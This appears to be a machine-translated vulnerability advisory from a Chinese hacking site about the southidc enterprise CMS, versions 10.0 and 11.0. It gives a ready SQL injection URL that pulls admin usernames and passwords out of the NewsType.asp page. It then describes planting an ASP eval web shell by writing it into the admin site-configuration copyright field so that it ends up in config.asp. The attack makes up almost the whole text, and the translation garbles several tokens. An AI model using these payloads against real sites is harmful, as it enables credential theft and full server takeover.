South data enterprise latest injection vulnerability-vulnerability warning-the black bar safety net

2009-06-27T00:00:00
ID MYHACK58:62200923678
Type myhack58
Reporter 佚名
Modified 2009-06-27T00:00:00

Description


By: A XoL-! http://www.tsbct.com


Found to date:

2008-09-25 Affected version: v10. 0 v11. 0

Trojan:

<http://www.southidc.net/0791idc11Q/NewsType.asp?SmallClass=>'%20union%20select%2 0 0,username%2BCHR(1 2 4)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%2 0*%20from%20news%20where%2 0 1=2%20and%2 0"='

Get the shell method:

In the website configuration[<http://www.target.com/admin/SiteConfig.asp>]the copyright information in the write"%><%eval(request(chr(3 5)))%><%' The success of the shell is written<http://www.target.com/inc/config.asp>